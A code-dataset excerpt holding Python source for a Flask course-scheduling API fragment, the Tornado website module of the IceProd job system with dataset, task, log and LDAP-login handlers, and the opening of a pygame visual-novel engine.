make_response('WRONG CRNS',400)\n \n users.updateUsers({'_id':userID}, {'classes':ls})\n\n return json.dumps({'success':True}), 200, {'ContentType':'application/json'} \n\ndef _getCourseMeetingLink(CRN):\n\n user = users.queryUsers({'_id': get_jwt_identity()})[0]\n\n if 'link' not in user:\n return None\n else:\n return user['link'].get(CRN, None)\n\ndef _setCourseMeetingLink(CRN, link):\n\n user = users.queryUsers({'_id': get_jwt_identity()})[0]\n links = user.get('link', {})\n links[CRN] = link\n users.updateUsers({'_id': get_jwt_identity()}, {'link': links})\n\n\n\n@bp.route('/byCRN//link' , methods=['POST', 'GET'])\n@jwt_required()\ndef processMeetingLink(CRN):\n\n if request.method == \"GET\":\n link = _getCourseMeetingLink(CRN)\n if link:\n return 
jsonify({'link':link})\n else:\n return jsonify({})\n \n else:\n _setCourseMeetingLink(CRN, request.json['link'])\n return json.dumps({'success':True}), 200, {'ContentType':'application/json'} \n\n\ndef _getCourseSections(subject, code):\n\n courses = courses_col.find({'SUBJECT': subject, \"CODE\": code})\n\n return [x['CRN'] for x in courses]\n\ndef _getCourses(user):\n user = users.queryUsers({'_id': user})[0]\n\n if 'classes' not in user:\n return []\n else: \n classes = []\n for crn in user['classes']: \n cl = _getCourseByCRN(crn)\n\n if cl:\n classes.append(cl)\n\n return classes\n\n@bp.route('')\n@jwt_required() \ndef getUserCourses():\n return jsonify(bsonifyList(_getCourses(get_jwt_identity())))\n\ndef _getCommonCourses(list1, list2):\n \n set1 = set(list1)\n set2 = set(list2)\n\n commonSections = set1.intersection(set2)\n differentSections1 = set1-commonSections\n differentSections2 = set2-commonSections\n\n courses1 = []\n courses2 = []\n\n for sec in differentSections1:\n course = _getCourseByCRN(sec)\n courses1.append(course['SUBJECT']+\"-\"+course['CODE'])\n\n for sec in differentSections2:\n course = _getCourseByCRN(sec)\n courses2.append(course['SUBJECT']+\"-\"+course['CODE'])\n \n courses1 = set(courses1)\n courses2 = set(courses2)\n\n commonCourses = courses1.intersection(courses2)\n\n response = []\n\n for sec in commonSections:\n course = _getCourseByCRN(sec)\n response.append({\n 'type':'section',\n 'group': sec,\n 'name': course['SUBJECT']+\"-\"+course['CODE']+\"-\"+course['SECTION']\n }) \n \n for course in commonCourses:\n\n response.append(\n {\n 'type':'course',\n 'group': course,\n 'name': course\n }\n )\n\n return response\n\n@bp.route('/common/')\n@jwt_required() \ndef getCommonCourses(otherID):\n\n list1 = users.queryUsers({'_id': get_jwt_identity()})[0]['classes']\n try:\n list2 = users.queryUsers({'_id': otherID})[0]['classes']\n except:\n return make_response(\"USER NOT FOUND\", 404)\n\n return jsonify(_getCommonCourses(list1, list2))\n\n\ndef nextInstanceOfEvent(course, weekday, hour, minute):\n\n del course['_id']\n\n location = _getCourseMeetingLink(course['CRN'])\n\n def datetimeInWeek(weekOffset, weekday, hour, minute):\n\n now = dt.now()\n d = dt(now.year, now.month, now.day, hour, minute, tzinfo = pytz.timezone('Etc/GMT-3'))\n\n d += timedelta(days=-now.weekday() + weekOffset*7+weekday)\n return d\n\n earliest = None\n\n #check for rest of week\n if weekday<=4:\n\n next_dates = []\n\n for i in range(weekday, len(course['S1_DAYS'])):\n\n if course['S1_DAYS'][i]:\n next_dates.append(datetimeInWeek(0,i, course['S1_START'][0], course['S1_START'][1]))\n\n if len(next_dates)==2:\n break\n\n for i in range(weekday, len(course['S2_DAYS'])):\n\n if course['S2_DAYS'][i]:\n next_dates.append(datetimeInWeek(0,i, course['S2_START'][0], course['S2_START'][1]))\n\n if len(next_dates)==4:\n break\n \n next_dates = sorted(next_dates)\n\n now = pytz.utc.localize(dt.now())\n now = now.astimezone(pytz.timezone('Etc/GMT-3'))\n\n while len(next_dates) and next_dates[-1] 4 or earliest == None:\n\n next_dates = []\n\n for i in range(len(course['S1_DAYS'])):\n\n if course['S1_DAYS'][i]:\n #next_dates.append(f'weekday={weekday}, i={i}, today={dt.now().isoformat()}, offset={7-weekday +i}, date={datetimeInWeek(1, i, course[\"S1_START\"][0], course[\"S1_START\"][1])}')\n next_dates.append(datetimeInWeek(1, i, course['S1_START'][0], course['S1_START'][1]))\n\n if len(next_dates)==2:\n break\n\n for i in range(len(course['S2_DAYS'])):\n\n if course['S2_DAYS'][i]:\n 
#next_dates.append(f'weekday={weekday}, i={i}, date={datetimeInWeek(1, i, course[\"S2_START\"][0], course[\"S2_START\"][1])}')\n next_dates.append(datetimeInWeek(1, i, course['S2_START'][0], course['S2_START'][1]))\n\n if len(next_dates)==4:\n break \n \n next_dates = sorted(next_dates, reverse=True)\n\n if location:\n temp = {'course': course, 'date': next_dates[-1], 'location': location, 'is_online': True}\n else:\n temp = {'course': course, 'date': next_dates[-1], 'location': course['S1_LOC'], 'is_online': False}\n\n if earliest == None or temp['date']`_,\na fast and scalable python web server.\n\nMain website\n------------\n\nThis is the external website users will see when interacting with IceProd.\nIt has been broken down into several sub-handlers for easier maintenance.\n\n\"\"\"\nfrom __future__ import absolute_import, division, print_function\n\nimport sys\nimport os\nimport time\nimport random\nimport binascii\nimport socket\nfrom threading import Thread,Event,Condition\nimport logging\nfrom contextlib import contextmanager\nfrom functools import partial, wraps\ntry:\n from urlparse import urlparse\nexcept ImportError:\n from urllib.parse import urlparse\nfrom datetime import timedelta\nfrom collections import defaultdict\n\nfrom iceprod.core.jsonUtil import json_encode,json_decode\n\nimport tornado.ioloop\nimport tornado.web\nimport tornado.httpserver\nimport tornado.gen\n\nimport tornado.concurrent\nimport concurrent.futures\nfrom rest_tools.client import RestClient\nfrom rest_tools.server import RestServer\n\nimport iceprod\nfrom iceprod.server import GlobalID, get_pkgdata_filename\nfrom iceprod.server import module\nfrom iceprod.server.ssl_cert import create_cert, verify_cert\nimport iceprod.core.functions\nfrom iceprod.server import documentation\n\nlogger = logging.getLogger('website')\n\nclass website(module.module):\n \"\"\"\n The main website module.\n\n Run the website, which is required for anything to work.\n \"\"\"\n\n def __init__(self,*args,**kwargs):\n # run default init\n super(website,self).__init__(*args,**kwargs)\n\n # set up local variables\n self.http_server = None\n\n def stop(self):\n \"\"\"Stop website\"\"\"\n # stop tornado\n try:\n if self.http_server:\n self.http_server.stop()\n except Exception:\n logger.error('cannot stop tornado', exc_info=True)\n super(website,self).stop()\n\n def start(self):\n \"\"\"Run the website\"\"\"\n super(website,self).start()\n\n try:\n # make sure directories are set up properly\n for d in self.cfg['webserver']:\n if '_dir' in d:\n path = self.cfg['webserver'][d]\n path = os.path.expanduser(os.path.expandvars(path))\n try:\n os.makedirs(path)\n except Exception:\n pass\n\n # get package data\n static_path = get_pkgdata_filename('iceprod.server','data/www')\n if static_path is None or not os.path.exists(static_path):\n logger.info('static path: %r',static_path)\n raise Exception('bad static path')\n template_path = get_pkgdata_filename('iceprod.server','data/www_templates')\n if template_path is None or not os.path.exists(template_path):\n logger.info('template path: %r',template_path)\n raise Exception('bad template path')\n\n if 'url' in self.cfg['rest_api']:\n rest_address = self.cfg['rest_api']['url']\n else:\n # for local systems\n rest_address = 'http://{}:{}'.format(\n self.cfg['rest_api']['address'],\n self.cfg['rest_api']['port'],\n )\n\n handler_args = {\n 'cfg':self.cfg,\n 'modules':self.modules,\n 'statsd':self.statsd,\n 'rest_api':rest_address,\n 'debug':True,\n }\n login_handler_args = handler_args.copy()\n 
login_handler_args['module_rest_client'] = self.rest_client\n if 'debug' in self.cfg['webserver'] and self.cfg['webserver']['debug']:\n handler_args['debug'] = True\n if 'cookie_secret' in self.cfg['webserver']:\n cookie_secret = self.cfg['webserver']['cookie_secret']\n else:\n cookie_secret = ''.join(hex(random.randint(0,15))[-1] for _ in range(64))\n self.cfg['webserver']['cookie_secret'] = cookie_secret\n\n routes = [\n (r\"/\", Default, handler_args),\n (r\"/submit\", Submit, handler_args),\n (r\"/config\", Config, handler_args),\n (r\"/dataset\", DatasetBrowse, handler_args),\n (r\"/dataset/(\\w+)\", Dataset, handler_args),\n (r\"/dataset/(\\w+)/task\", TaskBrowse, handler_args),\n (r\"/dataset/(\\w+)/task/(\\w+)\", Task, handler_args),\n (r\"/dataset/(\\w+)/job\", JobBrowse, handler_args),\n (r\"/dataset/(\\w+)/job/(\\w+)\", Job, handler_args),\n (r\"/help\", Help, handler_args),\n (r\"/docs/(.*)\", Documentation, handler_args),\n (r\"/dataset/(\\w+)/log/(\\w+)\", Log, handler_args),\n #(r\"/groups\", GroupsHandler, handler_args),\n (r'/profile', Profile, handler_args),\n (r\"/login\", Login, login_handler_args),\n (r\"/logout\", Logout, handler_args),\n (r\"/.*\", Other, handler_args),\n ]\n self.http_server = RestServer(\n static_path=static_path,\n template_path=template_path,\n cookie_secret=cookie_secret,\n login_url='/login',\n debug=handler_args['debug'],\n )\n for r in routes:\n self.http_server.add_route(*r)\n\n # start tornado\n self.http_server.startup(\n port=self.cfg['webserver']['port'],\n address='0.0.0.0', # bind to all\n )\n except Exception:\n logger.error('website startup error',exc_info=True)\n raise\n\n\ndef catch_error(method):\n \"\"\"Decorator to catch and handle errors on handlers\"\"\"\n @wraps(method)\n def wrapper(self, *args, **kwargs):\n try:\n return method(self, *args, **kwargs)\n except Exception as e:\n self.statsd.incr(self.__class__.__name__+'.error')\n logger.warning('Error in website handler', exc_info=True)\n message = 'Error generating page for '+self.__class__.__name__\n if self.debug:\n message = message + '\\n' + str(e)\n self.send_error(500, message=message)\n return wrapper\n\ndef authenticated_secure(method):\n \"\"\"Decorate methods with this to require that the user be logged in\n to a secure area.\n\n If the user is not logged in, they will be redirected to the configured\n `login url `.\n\n If you configure a login url with a query parameter, Tornado will\n assume you know what you're doing and use it as-is. 
If not, it\n will add a `next` parameter so the login page knows where to send\n you once you're logged in.\n \"\"\"\n @wraps(method)\n def wrapper(self, *args, **kwargs):\n if not self.current_user_secure:\n if self.request.method in (\"GET\", \"HEAD\"):\n url = self.get_login_url()\n if \"?\" not in url:\n if urlparse.urlsplit(url).scheme:\n # if login url is absolute, make next absolute too\n next_url = self.request.full_url()\n else:\n next_url = self.request.uri\n url += \"?\" + urlencode({'next':next_url,'secure':True})\n self.redirect(url)\n return\n raise HTTPError(403)\n return method(self, *args, **kwargs)\n return wrapper\n\n\nclass PublicHandler(tornado.web.RequestHandler):\n \"\"\"Default Handler\"\"\"\n def initialize(self, cfg, modules, debug=False, statsd=None,\n rest_api=None):\n \"\"\"\n Get some params from the website module\n\n :param cfg: the global config\n :param modules: modules handle\n :param debug: debug flag (optional)\n :param rest_api: the rest api url\n \"\"\"\n self.cfg = cfg\n self.modules = modules\n self.debug = debug\n self.statsd = statsd\n self.rest_api = rest_api\n self.current_user = None\n self.current_user_secure = None\n self.rest_client = None\n\n def set_default_headers(self):\n self._headers['Server'] = 'IceProd/' + iceprod.__version__\n\n def get_template_namespace(self):\n namespace = super(PublicHandler,self).get_template_namespace()\n namespace['version'] = iceprod.__version__\n namespace['section'] = self.request.uri.lstrip('/').split('?')[0].split('/')[0]\n namespace['master'] = ('master' in self.cfg and\n 'status' in self.cfg['master'] and\n self.cfg['master']['status'])\n namespace['master_url'] = ('master' in self.cfg and\n 'url' in self.cfg['master'] and\n self.cfg['master']['url'])\n namespace['site_id'] = (self.cfg['site_id'] if 'site_id' in self.cfg else None)\n namespace['sites'] = (self.cfg['webserver']['sites'] if (\n 'webserver' in self.cfg and\n 'sites' in self.cfg['webserver']) else None)\n namespace['json_encode'] = json_encode\n return namespace\n\n def prepare(self):\n try:\n data = self.get_secure_cookie(\"user\", max_age_days=1)\n if not data:\n raise Exception('user cookie is missing/empty')\n data = json_decode(data)\n user_secure = self.get_secure_cookie(\"user_secure\", max_age_days=0.01)\n if user_secure is not None and data['username'] != user_secure:\n raise Exception('mismatch between user_secure and username')\n self.current_user = data['username']\n self.current_user_data = data\n self.current_user_secure = (user_secure is not None)\n self.rest_client = RestClient(self.rest_api, data['token'], timeout=50)\n except Exception:\n logger.info('error getting current user', exc_info=True)\n self.clear_cookie(\"user\")\n self.clear_cookie(\"user_secure\")\n self.current_user = None\n\n def write_error(self,status_code=500,**kwargs):\n \"\"\"Write out custom error page.\"\"\"\n self.set_status(status_code)\n if status_code >= 500:\n self.write('
<h2>Internal Error</h2>')\n        else:\n            self.write('<h2>Request Error</h2>')\n        if 'message' in kwargs:\n            self.write('<br/>'.join(kwargs['message'].split('\\n')))\n        elif 'reason' in kwargs:\n            self.write('<br/>'.join(kwargs['reason'].split('\\n')))\n        elif self._reason:\n            self.write('<br/>
'.join(self._reason.split('\\n')))\n self.finish()\n\nclass Default(PublicHandler):\n \"\"\"Handle / urls\"\"\"\n @catch_error\n async def get(self):\n self.statsd.incr('default')\n self.render('main.html')\n\nclass Submit(PublicHandler):\n \"\"\"Handle /submit urls\"\"\"\n @catch_error\n @tornado.web.authenticated\n async def get(self):\n logger.info('here')\n self.statsd.incr('submit')\n url = self.request.uri[1:]\n ret = await self.rest_client.request('POST','/create_token')\n token = ret['result']\n groups = []\n logger.info('user_data: %r', self.current_user_data)\n logger.info('token: %r', token)\n if self.current_user_data and 'groups' in self.current_user_data:\n groups = self.current_user_data['groups']\n default_config = {\n \"categories\": [],\n \"dataset\": 0,\n \"description\": \"\",\n \"difplus\": None,\n \"options\": {\n },\n \"parent_id\": 0,\n \"steering\": None,\n \"tasks\": [],\n \"version\": 3\n }\n render_args = {\n 'passkey':token,\n 'edit':False,\n 'dataset_id':'',\n 'config':default_config,\n 'groups':groups,\n 'description':'',\n }\n self.render('submit.html',**render_args)\n\nclass Config(PublicHandler):\n \"\"\"Handle /config urls\"\"\"\n @catch_error\n @tornado.web.authenticated\n async def get(self):\n self.statsd.incr('config')\n dataset_id = self.get_argument('dataset_id',default=None)\n if not dataset_id:\n self.write_error(400,message='must provide dataset_id')\n return\n dataset = await self.rest_client.request('GET','/datasets/{}'.format(dataset_id))\n edit = self.get_argument('edit',default=False)\n if edit:\n ret = await self.rest_client.request('POST','/create_token')\n passkey = ret['result']\n else:\n passkey = None\n config = await self.rest_client.request('GET','/config/{}'.format(dataset_id))\n render_args = {\n 'edit':edit,\n 'passkey':passkey,\n 'dataset_id':dataset_id,\n 'config':config,\n 'description':dataset['description'],\n }\n self.render('submit.html',**render_args)\n\nclass DatasetBrowse(PublicHandler):\n \"\"\"Handle /dataset urls\"\"\"\n @catch_error\n @tornado.web.authenticated\n async def get(self):\n self.statsd.incr('dataset_browse')\n filter_options = {'status':['processing','suspended','errors','complete','truncated']}\n filter_results = {n:self.get_arguments(n) for n in filter_options}\n\n args = []\n for name in filter_results:\n val = filter_results[name]\n if any(v not in filter_options[name] for v in val):\n raise tornado.web.HTTPError(400, reason='Bad filter '+name+' value')\n args.append(name+'='+('|'.join(val)))\n\n url = '/datasets'\n if args:\n url += '?'+('&'.join(args))\n\n ret = await self.rest_client.request('GET', url)\n datasets = sorted(ret.values(), key=lambda x:x['dataset'], reverse=True)\n #logger.info('datasets: %r', datasets)\n self.render('dataset_browse.html',datasets=datasets,\n filter_options=filter_options,\n filter_results=filter_results)\n\nclass Dataset(PublicHandler):\n \"\"\"Handle /dataset urls\"\"\"\n @catch_error\n @tornado.web.authenticated\n async def get(self, dataset_id):\n self.statsd.incr('dataset')\n\n if dataset_id.isdigit():\n try:\n d_num = int(dataset_id)\n if d_num < 10000000:\n all_datasets = await self.rest_client.request('GET','/datasets')\n for d in all_datasets.values():\n if d['dataset'] == d_num:\n dataset_id = d['dataset_id']\n break\n except Exception:\n pass\n try:\n dataset = await self.rest_client.request('GET','/datasets/{}'.format(dataset_id))\n except Exception:\n raise tornado.web.HTTPError(404, reason='Dataset not found')\n dataset_num = dataset['dataset']\n\n ret = 
await self.rest_client.request('POST','/create_token')\n passkey = ret['result']\n\n jobs = await self.rest_client.request('GET','/datasets/{}/job_counts/status'.format(dataset_id))\n tasks = await self.rest_client.request('GET','/datasets/{}/task_counts/status'.format(dataset_id))\n task_info = await self.rest_client.request('GET','/datasets/{}/task_counts/name_status'.format(dataset_id))\n task_stats = await self.rest_client.request('GET','/datasets/{}/task_stats'.format(dataset_id))\n config = await self.rest_client.request('GET','/config/{}'.format(dataset_id))\n for t in task_info:\n logger.info('task_info[%s] = %r', t, task_info[t])\n for s in ('waiting','queued','processing','complete'):\n if s not in task_info[t]:\n task_info[t][s] = 0\n error = 0\n for s in ('reset','resume','failed'):\n if s in task_info[t]:\n error += task_info[t][s]\n task_info[t]['error'] = error\n for task in config['tasks']:\n if 'name' in task and task['name'] == t:\n task_info[t]['type'] = 'GPU' if 'requirements' in task and 'gpu' in task['requirements'] and task['requirements']['gpu'] else 'CPU'\n break\n else:\n task_info[t]['type'] = 'UNK'\n self.render('dataset_detail.html',dataset_id=dataset_id,dataset_num=dataset_num,\n dataset=dataset,jobs=jobs,tasks=tasks,task_info=task_info,task_stats=task_stats,passkey=passkey)\n\nclass TaskBrowse(PublicHandler):\n \"\"\"Handle /task urls\"\"\"\n @catch_error\n @tornado.web.authenticated\n async def get(self, dataset_id):\n self.statsd.incr('task_browse')\n status = self.get_argument('status',default=None)\n\n if status:\n tasks = await self.rest_client.request('GET','/datasets/{}/tasks?status={}'.format(dataset_id,status))\n for t in tasks:\n job = await self.rest_client.request('GET', '/datasets/{}/jobs/{}'.format(dataset_id, tasks[t]['job_id']))\n tasks[t]['job_index'] = job['job_index']\n ret = await self.rest_client.request('POST','/create_token')\n passkey = ret['result']\n self.render('task_browse.html',tasks=tasks, passkey=passkey)\n else:\n status = await self.rest_client.request('GET','/datasets/{}/task_counts/status'.format(dataset_id))\n self.render('tasks.html',status=status)\n\nclass Task(PublicHandler):\n \"\"\"Handle /task urls\"\"\"\n @catch_error\n @tornado.web.authenticated\n async def get(self, dataset_id, task_id):\n self.statsd.incr('task')\n status = self.get_argument('status',default=None)\n\n ret = await self.rest_client.request('POST','/create_token')\n passkey = ret['result']\n\n dataset = await self.rest_client.request('GET', '/datasets/{}'.format(dataset_id))\n task_details = await self.rest_client.request('GET','/datasets/{}/tasks/{}'.format(dataset_id, task_id))\n task_stats = await self.rest_client.request('GET','/datasets/{}/tasks/{}/task_stats?last=true'.format(dataset_id, task_id))\n if task_stats:\n task_stats = list(task_stats.values())[0]\n try:\n ret = await self.rest_client.request('GET','/datasets/{}/tasks/{}/logs?group=true'.format(dataset_id, task_id))\n logs = ret['logs']\n #logger.info(\"logs: %r\", logs)\n ret2 = await self.rest_client.request('GET','/datasets/{}/tasks/{}/logs?keys=log_id|name|timestamp'.format(dataset_id, task_id))\n logs2 = ret2['logs']\n logger.info(\"logs2: %r\", logs2)\n log_by_name = defaultdict(list)\n for log in sorted(logs2,key=lambda l:l['timestamp'] if 'timestamp' in l else '',reverse=True):\n log_by_name[log['name']].append(log)\n for log in logs:\n log_by_name[log['name']][0] = log\n except Exception:\n log_by_name = {}\n self.render('task_detail.html', dataset=dataset, task=task_details, 
task_stats=task_stats, logs=log_by_name, passkey=passkey)\n\nclass JobBrowse(PublicHandler):\n \"\"\"Handle /job urls\"\"\"\n @catch_error\n @tornado.web.authenticated\n async def get(self, dataset_id):\n self.statsd.incr('job')\n status = self.get_argument('status',default=None)\n\n ret = await self.rest_client.request('POST','/create_token')\n passkey = ret['result']\n\n jobs = await self.rest_client.request('GET', '/datasets/{}/jobs'.format(dataset_id))\n if status:\n for t in list(jobs):\n if jobs[t]['status'] != status:\n del jobs[t]\n continue\n self.render('job_browse.html', jobs=jobs, passkey=passkey)\n\nclass Job(PublicHandler):\n \"\"\"Handle /job urls\"\"\"\n @catch_error\n @tornado.web.authenticated\n async def get(self, dataset_id, job_id):\n self.statsd.incr('job')\n status = self.get_argument('status',default=None)\n\n ret = await self.rest_client.request('POST','/create_token')\n passkey = ret['result']\n\n dataset = await self.rest_client.request('GET', '/datasets/{}'.format(dataset_id))\n job = await self.rest_client.request('GET', '/datasets/{}/jobs/{}'.format(dataset_id,job_id))\n tasks = await self.rest_client.request('GET','/datasets/{}/tasks?job_id={}'.format(dataset_id,job_id))\n job['tasks'] = list(tasks.values())\n job['tasks'].sort(key=lambda x:x['task_index'])\n self.render('job_detail.html', dataset=dataset, job=job, passkey=passkey)\n\nclass Documentation(PublicHandler):\n @catch_error\n def get(self, url):\n self.statsd.incr('documentation')\n doc_path = get_pkgdata_filename('iceprod.server','data/docs')\n self.write(documentation.load_doc(doc_path+'/' + url))\n self.flush()\n\nclass Log(PublicHandler):\n @catch_error\n @tornado.web.authenticated\n async def get(self, dataset_id, log_id):\n self.statsd.incr('log')\n ret = await self.rest_client.request('GET','/datasets/{}/logs/{}'.format(dataset_id, log_id))\n log_text = ret['data']\n html = '<html><head><title>' + ret['name'] + '</title></head><body>'\n html += log_text.replace('\\n', '<br/>
')\n html += '</body></html>'\n self.write(html)\n self.flush()\n\nclass Help(PublicHandler):\n \"\"\"Help Page\"\"\"\n @catch_error\n def get(self):\n self.statsd.incr('help')\n self.render('help.html')\n\nclass Other(PublicHandler):\n \"\"\"Handle any other urls - this is basically all 404\"\"\"\n @catch_error\n def get(self):\n self.statsd.incr('other')\n path = self.request.path\n self.set_status(404)\n self.render('404.html',path=path)\n\nclass Profile(PublicHandler):\n \"\"\"Handle user profile page\"\"\"\n @catch_error\n @tornado.web.authenticated\n async def get(self):\n self.statsd.incr('profile')\n ret = await self.rest_client.request('POST','/create_token')\n token = ret['result']\n groups = []\n logger.info('user_data: %r', self.current_user_data)\n logger.info('token: %r', token)\n if self.current_user_data and 'groups' in self.current_user_data:\n groups = self.current_user_data['groups']\n self.render('profile.html', username=self.current_user, groups=groups,\n token=token)\n\nclass Login(PublicHandler):\n \"\"\"Handle the login url\"\"\"\n def initialize(self, module_rest_client, *args, **kwargs):\n \"\"\"\n Get some params from the website module\n\n :param module_rest_client: a REST Client\n \"\"\"\n super(Login, self).initialize(*args, **kwargs)\n self.module_rest_client = module_rest_client\n\n @catch_error\n def get(self):\n self.statsd.incr('login')\n n = self.get_argument('next', default='/')\n secure = self.get_argument('secure', default=None)\n self.clear_cookie(\"user\")\n self.clear_cookie(\"user_secure\")\n self.render('login.html', status=None, next=n)\n\n @catch_error\n async def post(self):\n n = self.get_argument('next', default='/')\n secure = self.get_argument('secure', default=None)\n username = self.get_argument('username')\n password = self.get_argument('password')\n self.clear_cookie(\"user\")\n self.clear_cookie(\"user_secure\")\n try:\n data = await self.module_rest_client.request('POST','/ldap',{'username':username,'password':password})\n cookie = json_encode(data)\n if secure:\n self.set_secure_cookie('user_secure', username, expires_days=0.01)\n self.set_secure_cookie('user', cookie, expires_days=1)\n self.redirect(n)\n except Exception:\n logger.info('failed', exc_info=True)\n self.render('login.html', status='failed', next=n)\n\nclass Logout(PublicHandler):\n @catch_error\n def get(self):\n self.statsd.incr('logout')\n self.clear_cookie(\"user\")\n self.clear_cookie(\"user_secure\")\n self.current_user = None\n self.render('logout.html', status=None)\n", "sub_path": "iceprod/server/modules/website.py", "file_name": "website.py", "file_ext": "py", "file_size_in_byte": 24341, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "logging.getLogger", "line_number": 50, "usage_type": "call"}, {"api_name": "iceprod.server.module.module", "line_number": 52, "usage_type": "attribute"}, {"api_name": "iceprod.server.module", "line_number": 52, "usage_type": "name"}, {"api_name": "os.path.expanduser", "line_number": 85, "usage_type": "call"}, {"api_name": "os.path", "line_number": 85, "usage_type": "attribute"}, {"api_name": "os.path.expandvars", "line_number": 85, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 87, "usage_type": "call"}, {"api_name": "iceprod.server.get_pkgdata_filename", "line_number": 92, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 93, "usage_type": "call"}, {"api_name": "os.path", "line_number": 93, "usage_type": "attribute"}, 
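Login.post above stores a json-encoded LDAP response in the signed 'user' cookie, plus a short-lived 'user_secure' marker when the user asked for a quickly-expiring session. A minimal sketch of the reading side using Tornado's standard secure-cookie API; the mixin name and the 'username' field are assumptions, and the module's real base handler is not shown in this extract:

import tornado.web
from iceprod.core.jsonUtil import json_decode  # same util this module imports

class CookieUserMixin(tornado.web.RequestHandler):
    def get_current_user(self):
        # get_secure_cookie() verifies the signature made with cookie_secret,
        # returning None for a missing or tampered cookie.
        cookie = self.get_secure_cookie('user')
        if not cookie:
            return None
        data = json_decode(cookie.decode('utf-8'))  # dict from the /ldap call
        return data.get('username')  # hypothetical field name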
{"api_name": "iceprod.server.get_pkgdata_filename", "line_number": 96, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 97, "usage_type": "call"}, {"api_name": "os.path", "line_number": 97, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 124, "usage_type": "call"}, {"api_name": "rest_tools.server.RestServer", "line_number": 146, "usage_type": "call"}, {"api_name": "functools.wraps", "line_number": 168, "usage_type": "call"}, {"api_name": "urllib.parse.urlparse.urlsplit", "line_number": 199, "usage_type": "call"}, {"api_name": "urllib.parse.urlparse", "line_number": 199, "usage_type": "name"}, {"api_name": "functools.wraps", "line_number": 193, "usage_type": "call"}, {"api_name": "tornado.ioloop.web", "line_number": 212, "usage_type": "attribute"}, {"api_name": "tornado.ioloop", "line_number": 212, "usage_type": "name"}, {"api_name": "iceprod.__version__", "line_number": 234, "usage_type": "attribute"}, {"api_name": "iceprod.__version__", "line_number": 238, "usage_type": "attribute"}, {"api_name": "iceprod.core.jsonUtil.json_encode", "line_number": 250, "usage_type": "name"}, {"api_name": "iceprod.core.jsonUtil.json_decode", "line_number": 258, "usage_type": "call"}, {"api_name": "rest_tools.client.RestClient", "line_number": 265, "usage_type": "call"}, {"api_name": "tornado.ioloop.web", "line_number": 297, "usage_type": "attribute"}, {"api_name": "tornado.ioloop", "line_number": 297, "usage_type": "name"}, {"api_name": "tornado.ioloop.web", "line_number": 334, "usage_type": "attribute"}, {"api_name": "tornado.ioloop", "line_number": 334, "usage_type": "name"}, {"api_name": "tornado.ioloop.web.HTTPError", "line_number": 371, "usage_type": "call"}, {"api_name": "tornado.ioloop.web", "line_number": 371, "usage_type": "attribute"}, {"api_name": "tornado.ioloop", "line_number": 371, "usage_type": "name"}, {"api_name": "tornado.ioloop.web", "line_number": 361, "usage_type": "attribute"}, {"api_name": "tornado.ioloop", "line_number": 361, "usage_type": "name"}, {"api_name": "tornado.ioloop.web.HTTPError", "line_number": 406, "usage_type": "call"}, {"api_name": "tornado.ioloop.web", "line_number": 406, "usage_type": "attribute"}, {"api_name": "tornado.ioloop", "line_number": 406, "usage_type": "name"}, {"api_name": "tornado.ioloop.web", "line_number": 388, "usage_type": "attribute"}, {"api_name": "tornado.ioloop", "line_number": 388, "usage_type": "name"}, {"api_name": "tornado.ioloop.web", "line_number": 439, "usage_type": "attribute"}, {"api_name": "tornado.ioloop", "line_number": 439, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 479, "usage_type": "call"}, {"api_name": "tornado.ioloop.web", "line_number": 459, "usage_type": "attribute"}, {"api_name": "tornado.ioloop", "line_number": 459, "usage_type": "name"}, {"api_name": "tornado.ioloop.web", "line_number": 491, "usage_type": "attribute"}, {"api_name": "tornado.ioloop", "line_number": 491, "usage_type": "name"}, {"api_name": "tornado.ioloop.web", "line_number": 510, "usage_type": "attribute"}, {"api_name": "tornado.ioloop", "line_number": 510, "usage_type": "name"}, {"api_name": "iceprod.server.get_pkgdata_filename", "line_number": 529, "usage_type": "call"}, {"api_name": "iceprod.server.documentation.load_doc", "line_number": 530, "usage_type": "call"}, {"api_name": "iceprod.server.documentation", "line_number": 530, "usage_type": "name"}, {"api_name": "tornado.ioloop.web", "line_number": 535, "usage_type": "attribute"}, {"api_name": "tornado.ioloop", 
"line_number": 535, "usage_type": "name"}, {"api_name": "tornado.ioloop.web", "line_number": 565, "usage_type": "attribute"}, {"api_name": "tornado.ioloop", "line_number": 565, "usage_type": "name"}, {"api_name": "iceprod.core.jsonUtil.json_encode", "line_number": 608, "usage_type": "call"}]} +{"seq_id": "465332386", "text": "import linecache\nimport os\nfrom ast import literal_eval\n\nimport mutagen.mp3\nimport pygame\nfrom pygame.rect import Rect\n\nimport utils.crypto as crypto\nfrom utils.action import Dissolve, Fade, Translate\nfrom utils.sprite import Sprite, Group\nfrom utils.text import Text\n\n'''important'''\nfrom utils.character import Character\n\n_script = \"assets/script.wfpy\"\n_img = \"assets/img/\"\n_scene = _img + \"scene/\"\n_bg = _scene + \"bg/\"\n_music = \"assets/music/\"\n_font = \"assets/fonts/CoconRegular.otf\"\n\n_lorem = \"Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et \" \\\n \"dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip \" \\\n \"ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu \" \\\n \"fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt \" \\\n \"mollit anim id est laborum.\"\n\nframe_size = Rect(0, 0, 1920, 1080)\n\nrecall = []\n\n\ndef get_line(i):\n return linecache.getline(_script, i)[:-1]\n # return crypto.decode_script(\"assets/script\", i)\n\n\nclass GameScreen:\n def __init__(self, core, win_size):\n self.core = core\n self.render = pygame.display.set_mode((win_size.w, win_size.h), pygame.RESIZABLE)\n\n self.cdict = {} # Characters dict\n self.ldict = {} # Label dict\n self.vdict = {} # Var dict\n\n # awhile\n self.spacing = 0\n\n # later from saves\n self.next = True\n self.i = 1\n self.tabs = 0\n self.depth = 0\n\n self.lines = 1\n with open(_script) as f:\n self.lines = sum(1 for line in f)\n\n self.panel = Sprite(crypto.decode_img(_img + \"panel\"))\n self.remove_file(_img + \"panel.png\")\n\n self.panel.set_alpha(.7)\n self.panel.scale(1920, 256)\n self.panel.set_midbottom(1920 / 2, 1080)\n\n self.action_pull = []\n self.group = Group()\n\n self.text = 